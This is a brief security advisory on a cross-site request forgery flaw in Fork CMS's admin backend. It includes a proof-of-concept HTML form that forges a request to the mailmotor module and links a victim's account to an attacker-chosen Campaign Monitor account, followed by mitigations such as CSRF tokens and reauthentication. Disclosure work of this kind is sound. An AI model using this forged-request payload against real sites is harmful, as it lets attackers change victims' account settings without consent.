Fork CMS suffers from a cross site request forgery vulnerability.
b1f5869ab5f633d45b74847ab258441ea7cf30e564f771344d4b1c00f8ba8c27
====================================================================================
Fork-CMS CSRF:
Introduction
Author: Rafay Baloch
CSRF OR XSRF (Cross site request forgery) occurs when the victim forces
your browser to send a forged request and makes
the victim performing a particular action. Any form missing with CSRF
tokens is vulnerable to it.
Impact:
An attacker can accomplish multiple things, he could change the victims
form details etc.
PROOF OF CONCEPT:
The above two forms are misssing with CSRF tokens:
The form is missing with CSRF tokens which means that an attacker can force
a user to link to a campaign monitor account.
http://demo.fork-cms.com/private/en/mailmotor/settings?token=true#tabSettingsAccount
POC:
<html>
<body>
<form action="http://demo.fork-cms.com/backend/ajax.php" method="POST">
<input type="hidden" name="fork[module]" value="mailmotor" />
<input type="hidden" name="fork[action]"
value="link_account" />
<input type="hidden" name="fork[language]" value="en" />
<input type="hidden" name="url" value="www.google.com" />
<input type="hidden" name="username" value="rafaybaloch" />
<input type="hidden" name="password" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
http://demo.fork-cms.com/private/en/settings/email
http://demo.fork-cms.com/backend/ajax.php
Mitigations:
- Reauthenticate the user, if he performs an important action upon his
account, e.g delete a user, delete himselves etc.
- Add a CSRF token to each and every request and make sure that it is
validated upon the server.